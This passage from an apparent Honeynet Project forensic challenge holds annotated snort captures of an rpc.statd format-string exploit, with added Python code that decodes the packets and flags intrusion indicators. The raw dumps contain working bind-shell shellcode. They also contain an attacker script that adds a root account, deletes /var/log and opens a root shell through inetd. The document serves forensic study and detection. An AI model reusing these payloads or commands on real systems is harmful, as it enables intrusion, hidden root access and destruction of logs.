90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:14.517554 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:49145
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....
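
As an added example (not part of the challenge and not the Honeynet Project's own code), the Python below rebuilds payload bytes from the snort dump lines, decodes the portmap GETPORT lookup that preceded this exploit and the RPC header of the statd packet, and extracts the traits an IDS keys on: the NOP sled behind the IDS362 alert, the printf `%n` directives of a format-string attack, and the printable strings. The GETPORT lines are copied verbatim from the capture; the statd sample is abbreviated (most of its NOP sled is dropped), as labelled in the code.

```python
"""Triage helpers for the snort hex dumps above (an added example, not the
Honeynet Project's code).  They rebuild payload bytes from dump lines, decode
the portmap GETPORT exchange and the statd call's RPC header, and flag what an
IDS keys on: NOP sled, printf %n directives, printable strings.  The GETPORT
lines are copied verbatim; the statd sample is abbreviated (most of its NOP
sled is dropped), so its XDR string length field (999) is no longer accurate."""
import re
import struct

RPC_PROGRAMS = {100000: "portmapper", 100024: "status (rpc.statd)"}
IP_PROTOS = {6: "tcp", 17: "udp"}

GETPORT_REQUEST = """
70 01 C4 19 00 00 00 00 00 00 00 02 00 01 86 A0 p...............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 06 00 00 00 00 ........
"""
GETPORT_REPLY = """
70 01 C4 19 00 00 00 01 00 00 00 00 00 00 00 00 p...............
00 00 00 00 00 00 00 00 00 00 03 A5 ............
"""
STATD_PACKET = """
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....
"""


def parse_snort_hex(dump: str) -> bytes:
    """Rebuild bytes from '<hex pairs> <ascii>' lines: 16 pairs max, stop at the ASCII column."""
    out = bytearray()
    for line in dump.strip().splitlines():
        for n, tok in enumerate(line.split()):
            if n == 16 or not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def decode_rpc_call(payload: bytes) -> dict:
    """Decode an ONC RPC v2 CALL header, credential and verifier (RFC 1831)."""
    xid, msg_type, rpcvers, prog, vers, proc = struct.unpack(">6I", payload[:24])
    if msg_type != 0 or rpcvers != 2:
        raise ValueError("not an RPC v2 CALL")
    cred_flavor, cred_len = struct.unpack(">II", payload[24:32])
    info = {"xid": xid, "prog": prog, "prog_name": RPC_PROGRAMS.get(prog, "?"),
            "vers": vers, "proc": proc, "cred_flavor": cred_flavor}
    if cred_flavor == 1:  # AUTH_UNIX: stamp, machinename<>, uid, gid, gids<>
        name_len = struct.unpack(">I", payload[36:40])[0]
        info["cred_host"] = payload[40:40 + name_len].decode("ascii", "replace")
    off = 32 + ((cred_len + 3) & ~3)  # XDR opaque bodies are padded to 4 bytes
    verf_len = struct.unpack(">I", payload[off + 4:off + 8])[0]
    info["args_offset"] = off + 8 + ((verf_len + 3) & ~3)
    return info


def decode_getport(request: bytes, reply: bytes) -> dict:
    """Pair a PMAPPROC_GETPORT call with its reply: what was asked for and what port came back."""
    call = decode_rpc_call(request)
    if call["prog"] != 100000 or call["proc"] != 3:
        raise ValueError("not a portmap GETPORT call")
    o = call["args_offset"]
    prog, vers, prot, _ = struct.unpack(">4I", request[o:o + 16])
    rxid, rtype, rstat, _flavor, vlen = struct.unpack(">5I", reply[:20])
    o = 20 + ((vlen + 3) & ~3)
    astat, port = struct.unpack(">II", reply[o:o + 8])
    if rxid != call["xid"] or rtype != 1 or rstat != 0 or astat != 0:
        raise ValueError("reply does not match the call or was not accepted")
    return {"program": prog, "program_name": RPC_PROGRAMS.get(prog, "?"),
            "version": vers, "proto": IP_PROTOS.get(prot, str(prot)), "port": port}


def payload_indicators(payload: bytes) -> dict:
    """Longest 0x90 run (IDS362's trigger), printf directives and %n count, printable strings."""
    nops = [len(m.group()) for m in re.finditer(rb"\x90+", payload)]
    directives = re.findall(rb"%\d*[a-zA-Z]", payload)
    strings = [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{4,}", payload)]
    return {"longest_nop_run": max(nops, default=0), "format_directives": len(directives),
            "percent_n_writes": directives.count(b"%n"), "strings": strings}
```

The same functions apply to the other packets in the capture, for example the second GETPORT pair (protocol 17, port 931) or the FTP PASS packet, whose NOP sled shows up the same way; note that "/bin/sh" never appears contiguously in the shellcode, so a plain string match for it would miss this payload.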

### The exploit is done. A shell was bound to port 39168. He
### now connects to this port and executes several commands.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.466595 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:49963 DF
**S***** Seq: 0x6B9CD069 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 98106716 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.467540 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:241 TOS:0x0 ID:26191
****R*** Seq: 0x0 Ack: 0x0 Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.468617 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48243 DF
**S***A* Seq: 0x4D5819B5 Ack: 0x6B9CD06A Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 107932029 98106716 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:21.613942 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:49978 DF
******A* Seq: 0x6B9CD06A Ack: 0x4D5819B6 Win: 0x7D78
TCP Options => NOP NOP TS: 98106736 107932029

### Here we see the commands executed by the bad guy. These commands
### appear to be scripted and NOT manually input. The script
### creates the following accounts (user: UID 5000, sendmail: UID 0).
### Notice the script deletes /var/log and adds a /bin/sh listening
### on port 16000.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.847098 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:50108 DF
*****PA* Seq: 0x6B9CD06A Ack: 0x4D5819B6 Win: 0x7D78
TCP Options => NOP NOP TS: 98106837 107932029
65 63 68 6F 20 75 73 65 72 3A 78 3A 35 30 30 30 echo user:x:5000
3A 35 30 30 30 3A 2F 75 73 65 72 3A 2F 74 6D 70 :5000:/user:/tmp
3A 2F 62 69 6E 2F 62 61 73 68 20 3E 3E 20 2F 65 :/bin/bash >> /e
74 63 2F 70 61 73 73 77 64 3B 20 65 63 68 6F 20 tc/passwd; echo
75 73 65 72 3A 59 69 32 79 43 47 48 6F 30 77 4F user:Yi2yCGHo0wO
77 67 3A 31 30 38 38 34 3A 30 3A 39 39 39 39 39 wg:10884:0:99999
3A 37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 :7:-1:-1:1345384
31 32 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 12 >> /etc/shado
77 3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C w; echo sendmail
3A 3A 31 30 38 36 35 3A 30 3A 39 39 39 39 39 3A ::10865:0:99999:
37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 36 7:-1:-1:13453846
30 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0 >> /etc/shadow
3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C 3A ; echo sendmail:
78 3A 30 3A 30 3A 3A 2F 72 6F 6F 74 3A 2F 62 69 x:0:0::/root:/bi
6E 2F 62 61 73 68 20 3E 3E 20 2F 65 74 63 2F 70 n/bash >> /etc/p
61 73 73 77 64 3B 20 70 77 63 6F 6E 76 3B 20 72 asswd; pwconv; r
6D 20 2D 72 66 20 2F 76 61 72 2F 6C 6F 67 3B 65 m -rf /var/log;e
63 68 6F 20 31 36 30 30 30 20 73 74 72 65 61 6D cho 16000 stream
20 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 tcp nowait root
20 2F 75 73 72 2F 73 62 69 6E 2F 74 63 70 64 20 /usr/sbin/tcpd
2F 62 69 6E 2F 73 68 20 3E 3E 20 2F 65 74 63 2F /bin/sh >> /etc/
69 6E 65 74 64 2E 63 6F 6E 66 3B 72 6D 20 2D 72 inetd.conf;rm -r
66 20 2F 65 74 63 2F 68 6F 73 74 73 2E 64 65 6E f /etc/hosts.den
79 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 y;killall -HUP i
6E 65 74 64 3B 00 02 40 68 38 01 40 C4 9C 04 08 netd;..@h8.@....
84 9C 04 25 D6 9C 04 08 02 00 00 25 00 00 00 00 ...%.......%....
08 00 00 00 44 9C 04 08 44 00 00 00 00 00 00 00 ....D...D.......
00 00 00 00 00 00 00 00 00 00 00 00 4C FC FF BF ............L...
EE 9B 04 08 C0 00 00 25 44 05 00 40 01 00 00 00 .......%D..@....
00 00 00 00 53 00 00 00 03 00 00 00 68 FD FF BF ....S.......h...
4F FC FF BF 48 9C 04 08 41 9C 04 08 07 00 00 00 O...H...A.......
FF FF FF FF 79 0D 00 40 A3 84 02 40 68 38 01 40 ....y..@...@h8.@
E0 43 01 40 D3 64 00 00 0E 9B 02 40 6C F8 FF BF .C.@.d.....@l...
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 02 14 00 40 ...@...@...@...@
80 F8 FF BF 02 14 00 40 88 F8 FF BF E6 81 00 40 .......@.......@
E1 13 00 40 D5 9A 02 40 68 38 01 40 0E 9B 02 40 ...@...@h8.@...@
A0 F8 FF BF E6 81 00 40 D5 9A 02 40 D5 9A 02 40 .......@...@...@
68 38 01 40 E0 43 01 40 23 38 00 00 C9 0E 00 40 h8.@.C.@#8.....@
00 00 00 00 A0 13 00 40 00 00 00 00 E0 43 01 40 .......@.....C.@
00 00 00 00 00 00 00 00 03 00 00 00 30 35 00 00 ............05..
01 00 00 00 00 00 64 20 00 00 00 00 00 00 00 00 ......d ........
A0 E2 01 40 53 03 00 00 D0 1F 02 40 70 AD 01 40 ...@S......@p..@
E0 43 01 40 03 00 00 00 50 46 01 40 01 00 00 00 .C.@....PF.@....
58 F8 73 20 FF FF FF FF F3 FF FF FF 00 00 00 00 X.s ............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 54 FF FF BF ............T...
FF FF FF FF D0 FB 04 08 00 00 00 00 00 00 00 00 ................
00 00 00 00 05 00 00 00 01 00 00 00 98 FD FF BF ................
6F FD FF BF ED 9B 04 08 EB 9B 04 08 0E 00 00 00 o...............
FF FF FF FF FD A7 00 40 D0 43 01 40 C0 46 01 40 .......@.C.@.F.@
07 00 00 00 4E A7 00 40 EC 81 10 40 29 B9 0F 40 ....N..@...@)..@
C5 B8 0F 40 E0 43 01 40 A0 E2 01 40 FC 84 10 40 ...@.C.@...@...@
F3 57 02 40 A0 E2 01 40 50 F9 FF BF 70 A9 00 40 .W.@...@P...p..@
14 00 00 00 04 F9 FF BF C0 81 07 40 E0 43 01 40 ...........@.C.@
EE 9B 04 08 EC 81 10 40 50 F9 FF BF 1B 3A 03 40 .......@P....:.@
43 00 0F 40 00 00 00 00 00 00 00 00 47 45 53 2F C..@........GES/
6C 69 62 63 2E 6D 6F 00 EC 81 10 40 05 00 00 00 libc.mo....@....
74 FE FF BF E0 43 01 40 0F F9 FF BF B4 83 10 40 t....C.@.......@
B6 42 02 40 6F 00 01 40 05 00 00 00 00 F9 FF BF .B.@o..@........
04 F9 FF BF D6 B8 0F 40 EF B8 0F 40 00 00 00 00 .......@...@....
6C F9 FF BF 24 64 0E 40 C0 B8 0F 40 06 24 10 40 l...$d.@...@.$.@
05 00 00 00 EC 81 10 40 DD FB 04 08 96 61 0E 40 .......@.....a.@
DD FB 04 08 06 24 10 40 EC 81 10 40 60 AE 00 40 .....$.@...@`..@
74 FE FF BF D0 FB 04 08 05 00 00 00 00 00 00 00 t...............
00 00 00 00 E8 80 01 40 18 00 00 00 F4 17 00 40 .......@.......@
04 00 00 00 E8 80 01 40 00 3C 01 40 0C FA FF BF .......@.<.@....
08 FA FF BF 04 FA FF BF 00 3C 01 40 D4 80 01 40 .........<.@...@
00 00 00 00 14 08 00 40 D4 38 01 40 02 14 00 40 .......@.8.@...@
F4 02 00 40 80 87 04 08 80 87 04 08 24 FA FF BF ...@........$...
02 00 00 00 D0 1F 02 40 00 3C 01 40 15 BA 00 40 .......@.<.@...@
68 38 01 40 14 08 00 40 B0 41 00 40 01 00 00 00 h8.@...@.A.@....
0C FA FF BF 28 15 00 40 C8 02 00 00 00 00 00 00 ....(..@........
80 87 04 08 00 00 00 00 01 00 00 00 24 08 00 40 ............$..@
2C FA FF BF BB 75 00 40 00 50 01 40 B2 2F 00 00 ,....u.@.P.@./..
68 38 01 40 64 FB FF BF 0E 38 00 40 68 38 01 40 h8.@d....8.@h8.@
0C 22 00 40 0E 9B 02 40 18 FB FF BF C1 0A 03 40 .".@...@.......@
EC 81 10 40 CC FB FF BF EC 81 10 40 EC 81 10 40 ...@.......@...@
FC FB FF BF 10 FD FF BF 68 38 01 40 C1 0A 03 40 ........h8.@...@
EC 81 10 40 EC FB FF BF EC 81 10 40 EC 81 10 40 ...@.......@...@
1C FC FF BF 30 FD FF BF 08 FC FF BF 00 00 00 00 ....0...........
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@
00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00 ........(.......
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@
00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF ...........@....
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40 ...@...@...@h8.@
E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF .C.@.h.....@....
20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08 ..........@....
14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00 .... ... a......
90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40 ...........@...@
12 06 00 00 D0 1F 02 40 70 AD 01 40 E0 43 01 40 .......@p..@.C.@
03 00 00 00 50 46 01 40 ....PF.@
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.851135 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48244 DF
******A* Seq: 0x4D5819B6 Ack: 0x6B9CD612 Win: 0x7C70
TCP Options => NOP NOP TS: 107932167 98106837
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.851231 207.19.5.25:2646 -> 172.16.1.104:39168
TCP TTL:49 TOS:0x0 ID:50109 DF
***F*PA* Seq: 0x6B9CD612 Ack: 0x4D5819B6 Win: 0x7D78
TCP Options => NOP NOP TS: 98106837 107932029
01 00 00 00 54 FB FF BF 90 0E 02 40 E4 45 01 40 ....T......@.E.@
AE C7 1F 0D D0 FB FF BF EC 81 10 40 EC 81 10 40 ...........@...@
90 01 05 08 90 01 05 08 90 01 00 00 EC 81 10 40 ...............@
90 FB FF BF 80 64 00 00 A8 FB FF BF A8 FB FF BF .....d..........
00 00 00 00 90 FB FF BF F0 11 02 40 D6 34 00 00 ...........@.4..
D0 1F 02 40 70 AD 01 40 E0 43 01 40 08 03 00 00 ...@p..@.C.@....
A9 46 00 00 A4 81 01 00 C1 0A 03 40 EC 81 10 40 .F.........@...@
CC FB FF BF EC 81 10 40 EC 81 10 40 FC FB FF BF .......@...@....
10 FD FF BF CA 3F 32 3A 00 00 00 00 05 00 00 00 .....?2:........
ED 9B 0A 40 FC FB FF BF FC FB FF BF 02 00 00 00 ...@............
90 FC FF BF 00 00 00 00 2C 79 0E 40 60 AE 00 40 ........,y.@`..@
74 FE FF BF FF FF FF FF 20 68 10 40 00 70 01 40 t....... h.@.p.@
90 FC FF BF 01 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00 ........(.......
05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@
00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF ...........@....
E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40 ...@...@...@h8.@
E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF .C.@.h.....@....
20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08 ..........@....
14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00 .... ... a......
90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40 ...........@...@
00 00 00 00 68 AC 03 40 00 00 00 00 00 00 00 00 ....h..@........
A7 9B 04 08 00 00 00 00 00 00 00 00 A4 54 02 40 .............T.@
3E 69 02 40 44 5F 02 40 30 85 04 08 84 34 AD FB >i.@D_.@0....4..
30 85 04 08 26 03 00 00 20 02 02 40 4B 05 00 00 0...&... ..@K...
D0 1F 02 40 70 AD 01 40 E0 43 01 40 03 00 00 00 ...@p..@.C.@....
EC 81 10 40 E4 E7 06 40 04 00 00 00 00 60 01 40 ...@...@.....`.@
0E 00 00 00 EC 81 10 40 00 60 01 40 90 01 05 08 .......@.`.@....
20 02 02 40 E0 43 01 40 24 FD FF BF C4 E8 06 40 ..@.C.@$......@
90 01 05 08 0E 60 01 40 00 00 01 00 00 00 00 00 .....`.@........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:22.853395 172.16.1.104:39168 -> 207.19.5.25:2646
TCP TTL:63 TOS:0x0 ID:48245 DF
******A* Seq: 0x4D5819B6 Ack: 0x6B9CD86B Win: 0x7A17
TCP Options => NOP NOP TS: 107932168 98106837
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
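As an added forensic example (not part of the Honeynet Project's challenge text), the following Python rebuilds the payload from the snort hex dump above and flags the host-modification steps in the captured script. The input is a constructed excerpt of the dump lines shown above, and the indicator patterns are the editor's own assumptions.

```python
import re
# Constructed input: 13 lines copied from the snort payload dump above
# (hex column plus the lossy ASCII column), covering the tail of the script.
SNORT_DUMP = """\
3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C 3A ; echo sendmail:
78 3A 30 3A 30 3A 3A 2F 72 6F 6F 74 3A 2F 62 69 x:0:0::/root:/bi
6E 2F 62 61 73 68 20 3E 3E 20 2F 65 74 63 2F 70 n/bash >> /etc/p
61 73 73 77 64 3B 20 70 77 63 6F 6E 76 3B 20 72 asswd; pwconv; r
6D 20 2D 72 66 20 2F 76 61 72 2F 6C 6F 67 3B 65 m -rf /var/log;e
63 68 6F 20 31 36 30 30 30 20 73 74 72 65 61 6D cho 16000 stream
20 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 tcp nowait root
20 2F 75 73 72 2F 73 62 69 6E 2F 74 63 70 64 20 /usr/sbin/tcpd
2F 62 69 6E 2F 73 68 20 3E 3E 20 2F 65 74 63 2F /bin/sh >> /etc/
69 6E 65 74 64 2E 63 6F 6E 66 3B 72 6D 20 2D 72 inetd.conf;rm -r
66 20 2F 65 74 63 2F 68 6F 73 74 73 2E 64 65 6E f /etc/hosts.den
79 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 y;killall -HUP i
6E 65 74 64 3B 00 02 40 68 38 01 40 C4 9C 04 08 netd;..@h8.@....
"""
HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")

def parse_snort_dump(dump: str) -> bytes:
    """Rebuild the payload from the hex column only: it is the run of leading
    two-hex-digit tokens (at most 16 per line); the ASCII column is lossy."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[:16]:
            if not HEX_BYTE.match(tok):
                break  # ASCII column reached on a short line
            out.append(int(tok, 16))
    return bytes(out)
def extract_command(payload: bytes) -> str:
    """The script is NUL-terminated; bytes after the NUL are leftover stack."""
    end = payload.find(b"\x00")
    return payload[:end if end >= 0 else len(payload)].decode("ascii", "replace")

# Host-modification indicators (editor's patterns, matched against the script).
INDICATORS = {
    "appends to /etc/passwd": r">>\s*/etc/passwd",
    "creates UID 0 account": r"echo\s+\w+:x:0:0:",
    "wipes /var/log": r"rm\s+-rf\s+/var/log",
    "adds inetd shell service": r"echo\s+\d+\s+stream\s+tcp\s+nowait\s+root.*>>\s*/etc/inetd\.conf",
    "removes /etc/hosts.deny": r"rm\s+-rf\s+/etc/hosts\.deny",
    "reloads inetd": r"killall\s+-HUP\s+inetd",
}
def analyse(dump: str) -> dict:
    cmd = extract_command(parse_snort_dump(dump))
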